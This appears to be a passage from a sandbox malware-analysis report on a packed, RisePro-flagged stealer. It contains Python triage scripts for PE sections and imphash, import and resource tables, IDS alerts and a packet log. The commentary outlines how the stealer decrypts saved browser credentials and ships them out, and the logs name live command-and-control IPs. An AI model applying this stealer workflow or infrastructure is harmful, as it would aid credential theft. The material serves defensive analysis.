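IMAGE_SCN_CNT_CODE = 0x00000020        # winnt.h section characteristics
IMAGE_SCN_MEM_EXECUTE = 0x20000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}
NAME_OK = re.compile(r"\.?[A-Za-z0-9_$]+")   # what a normal linker emits; '#', '[', a second '.' fail it
ENTROPY_THRESHOLD = 7.0                      # my threshold, not a value from the report


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 when all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from raw PE file bytes (PE32 or PE32+)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                      # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                          # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]    # AddressOfEntryPoint (same offset in PE32/PE32+)
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i                        # 40-byte IMAGE_SECTION_HEADER entries
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": raw_name.split(b"\0", 1)[0].decode("latin-1"),
                         "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])})
    return entry_rva, sections


def triage(pe: bytes) -> dict:
    """Report the section-level traits the sandbox signatures flag on this sample."""
    entry_rva, sections = parse_pe(pe)
    findings, entry_section = [], None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_section = s["name"]
        if not NAME_OK.fullmatch(s["name"]):
            findings.append(f"section name with special chars: {s['name']!r}")
        if s["raw_size"] == 0 and s["vsize"] > 0:
            findings.append(f"virtual-only section, populated at run time: {s['name']!r}")
        if s["entropy"] > ENTROPY_THRESHOLD and s["chars"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
            findings.append(f"high-entropy executable section: {s['name']!r} ({s['entropy']:.2f})")
    if entry_section not in STANDARD_CODE_SECTIONS:
        findings.append(f"entry point 0x{entry_rva:x} lies in {entry_section!r}, outside the standard code sections")
    return {"entry_section": entry_section, "findings": findings, "sections": sections}


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the real sample) copying the report's layout: two empty sections with
    packer-style names and a high-entropy executable section that holds the entry point."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))  # 2 KiB deterministic filler
    raw_ptr = 0x200                                          # first file-aligned slot after the headers
    layout = [  # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
        (b".text",   0x2000, 0x1000, 0, 0, 0x60000020),
        (b".vmp#+",  0x1000, 0x3000, 0, 0, 0x60000020),
        (b".vmpY[.", len(packed), 0x4000, len(packed), raw_ptr, 0xE0000060),
    ]
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0); struct.pack_into("<H", opt, 0, 0x10B); struct.pack_into("<I", opt, 16, 0x4100)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", *f[:5], 0, 0, 0, 0, f[5]) for f in layout)
    image = bytearray(dos + b"PE\0\0" + coff + opt + hdrs)
    return bytes(image + b"\0" * (raw_ptr - len(image)) + packed)


if __name__ == "__main__":
    result = triage(open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe())
    for s in result["sections"]:
        print(f"{s['name']!r:12} va=0x{s['va']:06x} vsize=0x{s['vsize']:x} raw=0x{s['raw_size']:x} H={s['entropy']:.2f}")
    for f in result["findings"]:
        print("!", f)
```

The virtual-only check is the one to watch: on a normal binary a zero raw size only appears for .bss-style data, so an executable section with no bytes on disk and a six-figure virtual size is a strong sign that the real code is decompressed into it after load, which is consistent with the "Detected unpacking (changes PE section rights)" signature above.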
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    AFX_DIALOG_LAYOUT | 0xf9c6bc | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6bc | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6c0 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6c0 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6c4 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6c4 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6c8 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6c8 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6cc | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6cc | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6d0 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6d0 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6d4 | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6d8 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6d8 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6dc | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6e0 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6e0 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6e4 | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6e8 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6e8 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6ec | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6f0 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6f0 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6f4 | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6f8 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6f8 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c6fc | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c700 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c700 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c704 | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c708 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c708 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c70c | 0x2 | data | | | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c710 | 0x2 | data | Korean | North Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c710 | 0x2 | data | Korean | South Korea | 5.0
                    AFX_DIALOG_LAYOUT | 0xf9c714 | 0x7a | data | | | 0.09836065573770492
                    AFX_DIALOG_LAYOUT | 0xf9c790 | 0x7a | data | Korean | North Korea | 0.10714285714285714
                    AFX_DIALOG_LAYOUT | 0xf9c790 | 0x7a | data | Korean | South Korea | 0.10714285714285714
                    AFX_DIALOG_LAYOUT | 0xf9c80c | 0x2 | empty | | | 0
                    AFX_DIALOG_LAYOUT | 0xf9c810 | 0x2 | empty | Korean | North Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c810 | 0x2 | empty | Korean | South Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c814 | 0x2 | empty | | | 0
                    AFX_DIALOG_LAYOUT | 0xf9c818 | 0x2 | empty | Korean | North Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c818 | 0x2 | empty | Korean | South Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c81c | 0x2 | empty | | | 0
                    AFX_DIALOG_LAYOUT | 0xf9c820 | 0x2 | empty | Korean | North Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c820 | 0x2 | empty | Korean | South Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c824 | 0x2 | empty | | | 0
                    AFX_DIALOG_LAYOUT | 0xf9c828 | 0x2 | empty | Korean | North Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c828 | 0x2 | empty | Korean | South Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c82c | 0x5a | empty | | | 0
                    AFX_DIALOG_LAYOUT | 0xf9c888 | 0x5a | empty | Korean | North Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c888 | 0x5a | empty | Korean | South Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c8e4 | 0x2 | empty | | | 0
                    AFX_DIALOG_LAYOUT | 0xf9c8e8 | 0x2 | empty | Korean | North Korea | 0
                    AFX_DIALOG_LAYOUT | 0xf9c8e8 | 0x2 | empty | Korean | South Korea | 0
                    RT_ICON | 0xf768b4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.774822695035461
                    RT_ICON | 0xf76d1c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.5385892116182572
                    RT_ICON | 0xf792c4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.4255441854962735
                    RT_ICON | 0xf89aec | 0x11965 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.999250385218707
                    RT_MENU | 0xf9c8ec | 0x2f4 | empty | | | 0
                    RT_MENU | 0xf9cbe0 | 0x308 | empty | Korean | North Korea | 0
                    RT_MENU | 0xf9cbe0 | 0x308 | empty | Korean | South Korea | 0
                    RT_GROUP_ICON | 0xf9b454 | 0x3e | data | | | 0.8225806451612904
                    RT_VERSION | 0xf9b494 | 0x3ec | data | | | 0.3615537848605578
                    RT_MANIFEST | 0xf9b880 | 0xe3b | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.38594564919022784
                    DLL | Import
                    KERNEL32.dll | GetVersionExA
                    USER32.dll | wsprintfA
                    GDI32.dll | CreateCompatibleBitmap
                    ADVAPI32.dll | RegQueryValueExA
                    SHELL32.dll | ShellExecuteA
                    ole32.dll | CoInitialize
                    WS2_32.dll | WSAStartup
                    CRYPT32.dll | CryptUnprotectData
                    SHLWAPI.dll | PathFindExtensionA
                    gdiplus.dll | GdipGetImageEncoders
                    SETUPAPI.dll | SetupDiEnumDeviceInfo
                    ntdll.dll | RtlUnicodeStringToAnsiString
                    RstrtMgr.DLL | RmStartSession
                    KERNEL32.dll | HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                    WTSAPI32.dll | WTSSendMessageW
                    KERNEL32.dll | VirtualQuery, GetSystemTimeAsFileTime, GetModuleHandleA, CreateEventA, GetModuleFileNameW, LoadLibraryA, TerminateProcess, GetCurrentProcess, CreateToolhelp32Snapshot, Thread32First, GetCurrentProcessId, GetCurrentThreadId, OpenThread, Thread32Next, CloseHandle, SuspendThread, ResumeThread, WriteProcessMemory, GetSystemInfo, VirtualAlloc, VirtualProtect, VirtualFree, GetProcessAffinityMask, SetProcessAffinityMask, GetCurrentThread, SetThreadAffinityMask, Sleep, FreeLibrary, GetTickCount, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFree, LocalAlloc, LocalFree, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetModuleHandleW, LoadResource, MultiByteToWideChar, FindResourceExW, FindResourceExA, WideCharToMultiByte, GetThreadLocale, GetUserDefaultLCID, GetSystemDefaultLCID, EnumResourceNamesA, EnumResourceNamesW, EnumResourceLanguagesA, EnumResourceLanguagesW, EnumResourceTypesA, EnumResourceTypesW, CreateFileW, LoadLibraryW, GetLastError, FlushFileBuffers, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetCommandLineA, RaiseException, RtlUnwind, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, LCMapStringA, LCMapStringW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, QueryPerformanceCounter, HeapReAlloc, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteFile, SetFilePointer, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, SetStdHandle
                    USER32.dll | GetProcessWindowStation, GetUserObjectInformationW, CharUpperBuffW, MessageBoxW
                    KERNEL32.dll | LocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                    USER32.dll | GetProcessWindowStation, GetUserObjectInformationW
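The Import Hash shown in the static section (d784b50e0634f83cc71436d4fb111768) is an MD5 over the import directory in the order the loader walks it, so samples built from the same packer stub share it even when the payload changes, and a single reordered or added import changes it entirely. The script below, an added example and not code from the report or from pefile, reproduces that construction (DLL name lowercased with a .dll/.sys/.ocx extension removed, function name lowercased or ordN for an ordinal import, entries comma-joined, MD5) and sorts the imported names above into the capability buckets a triager would assign; the bucket names and API groupings are my own. The sample import list is transcribed from this page's table rather than read from the binary, and the table's row order is not necessarily the file's directory order, so the hash it yields is not expected to equal the value on the page. Two differences from pefile are deliberate and noted in the code: well-known ws2_32/oleaut32 ordinals are not resolved to names, and delay-load imports (the sample has a DELAY_IMPORT directory) are never part of the hash.

```python
import hashlib

IMPHASH_STRIP_EXTS = ("ocx", "sys", "dll")

# API groupings are my own triage buckets; each is a set of import names that together suggest the capability
CAPABILITIES = {
    "credential_access": {"CryptUnprotectData"},                       # DPAPI: browser/mail password blobs
    "locked_file_access": {"RmStartSession"},                          # Restart Manager: free locked browser DBs
    "process_injection": {"WriteProcessMemory", "VirtualAlloc", "VirtualProtect",
                          "SuspendThread", "ResumeThread", "OpenThread"},
    "thread_enumeration": {"CreateToolhelp32Snapshot", "Thread32First", "Thread32Next"},
    "anti_debug": {"IsDebuggerPresent"},
    "dynamic_api_resolution": {"LoadLibraryA", "GetProcAddress"},
    "screen_capture": {"CreateCompatibleBitmap", "GdipGetImageEncoders"},
    "network": {"WSAStartup"},
}

# Transcribed from the import table above; the long KERNEL32 block is trimmed to the entries used here
REPORT_IMPORTS = [
    ("KERNEL32.dll", ["GetVersionExA"]),
    ("USER32.dll", ["wsprintfA"]),
    ("GDI32.dll", ["CreateCompatibleBitmap"]),
    ("ADVAPI32.dll", ["RegQueryValueExA"]),
    ("SHELL32.dll", ["ShellExecuteA"]),
    ("ole32.dll", ["CoInitialize"]),
    ("WS2_32.dll", ["WSAStartup"]),
    ("CRYPT32.dll", ["CryptUnprotectData"]),
    ("SHLWAPI.dll", ["PathFindExtensionA"]),
    ("gdiplus.dll", ["GdipGetImageEncoders"]),
    ("SETUPAPI.dll", ["SetupDiEnumDeviceInfo"]),
    ("ntdll.dll", ["RtlUnicodeStringToAnsiString"]),
    ("RstrtMgr.DLL", ["RmStartSession"]),
    ("KERNEL32.dll", ["HeapAlloc", "HeapFree", "ExitProcess", "GetModuleHandleA", "LoadLibraryA", "GetProcAddress"]),
    ("WTSAPI32.dll", ["WTSSendMessageW"]),
    ("KERNEL32.dll", ["CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "Thread32Next",
                      "SuspendThread", "ResumeThread", "WriteProcessMemory", "VirtualAlloc",
                      "VirtualProtect", "IsDebuggerPresent"]),
]


def imphash_input(imports) -> str:
    """Build the string that gets hashed: 'lib.func' entries, comma-joined, in import-directory order.

    imports is [(dll_name, [func_name or ordinal_int, ...]), ...]. Not replicated from pefile: its
    lookup of well-known ws2_32/oleaut32 ordinals to names before hashing (an ordinal here always
    becomes 'ordN'). Delay-load imports are excluded from the hash by definition.
    """
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        base, _, ext = lib.rpartition(".")
        if base and ext in IMPHASH_STRIP_EXTS:
            lib = base
        for f in funcs:
            name = f"ord{f}" if isinstance(f, int) else f.lower()
            parts.append(f"{lib}.{name}")
    return ",".join(parts)


def imphash(imports) -> str:
    """Hex MD5 of the imphash input string."""
    return hashlib.md5(imphash_input(imports).encode()).hexdigest()


def capabilities(imports) -> dict:
    """Map each capability bucket to the sorted list of its APIs that the binary imports by name."""
    present = {f for _, funcs in imports for f in funcs if isinstance(f, str)}
    return {cap: sorted(apis & present) for cap, apis in CAPABILITIES.items() if apis & present}


if __name__ == "__main__":
    print("imphash of the transcribed list:", imphash(REPORT_IMPORTS))
    for cap, apis in capabilities(REPORT_IMPORTS).items():
        print(f"{cap:24} {', '.join(apis)}")
```

Read the buckets together rather than one at a time: DPAPI decryption plus Restart Manager plus a socket stack is the classic stealer profile (decrypt saved browser credentials, release the locked SQLite databases first, ship them out), and the thread-suspend/WriteProcessMemory group matches the "Overwrites code with unconditional jumps" and "Creates a process in suspended mode" signatures at the top of the page.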
                    Language of compilation system | Country where language is spoken | Map
                    Korean | North Korea | 
                    Korean | South Korea | 
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    05/17/24-23:45:00.848746 | TCP | 2049060 | ET TROJAN RisePro TCP Heartbeat Packet | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    05/17/24-23:45:05.461512 | TCP | 2046269 | ET TROJAN [ANY.RUN] RisePro TCP (Activity) | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    05/17/24-23:45:05.093768 | TCP | 2046268 | ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    05/17/24-23:45:14.161367 | TCP | 2019714 | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile | 49707 | 80 | 192.168.2.5 | 5.42.96.170
                    05/17/24-23:45:02.216807 | TCP | 2046267 | ET TROJAN [ANY.RUN] RisePro TCP (External IP) | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    05/17/24-23:45:01.844974 | TCP | 2046266 | ET TROJAN [ANY.RUN] RisePro TCP (Token) | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    May 17, 2024 23:45:00.823570013 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:00.830173969 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:00.830306053 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:00.848746061 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:00.888148069 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:01.844974041 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:01.898729086 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:02.212306023 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:02.212758064 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:02.216774940 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:02.216806889 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:02.216887951 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:02.442466974 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:02.442562103 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:02.447838068 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:02.505626917 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:02.505665064 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:02.505752087 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:02.507396936 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:02.507406950 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.331181049 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.331459045 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.335395098 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.335402012 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.335609913 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.383002043 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.397473097 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.444129944 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.670281887 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.670437098 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.670505047 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.673120022 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.673135042 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.673151970 CEST | 49705 | 443 | 192.168.2.5 | 34.117.186.192
                    May 17, 2024 23:45:03.673157930 CEST | 443 | 49705 | 34.117.186.192 | 192.168.2.5
                    May 17, 2024 23:45:03.771847963 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:03.771873951 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:03.771949053 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:03.772314072 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:03.772325039 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:04.619467020 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:04.619560957 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:04.622503042 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:04.622514963 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:04.622746944 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:04.624036074 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:04.664135933 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:05.081523895 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:05.081813097 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:05.081913948 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:05.087728977 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:05.087744951 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:05.087759018 CEST | 49706 | 443 | 192.168.2.5 | 172.67.75.166
                    May 17, 2024 23:45:05.087764025 CEST | 443 | 49706 | 172.67.75.166 | 192.168.2.5
                    May 17, 2024 23:45:05.093767881 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:05.177021027 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:05.461512089 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:05.466664076 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:05.517889977 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:05.570538998 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:05.649158001 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:05.656826019 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:05.834423065 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:05.883008003 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.044207096 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.086308002 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.086450100 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.096681118 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.450611115 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.452780008 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.452914953 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.457537889 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.462457895 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.462470055 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.462507963 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.508004904 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.604279041 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:06.633135080 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:06.638257980 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:07.002048969 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:07.054877043 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:07.070698023 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:07.112792015 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:07.485585928 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:07.539239883 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:11.537136078 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:11.542507887 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.544882059 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:11.549984932 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.550066948 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:11.554996967 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555010080 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555022001 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555033922 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555046082 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
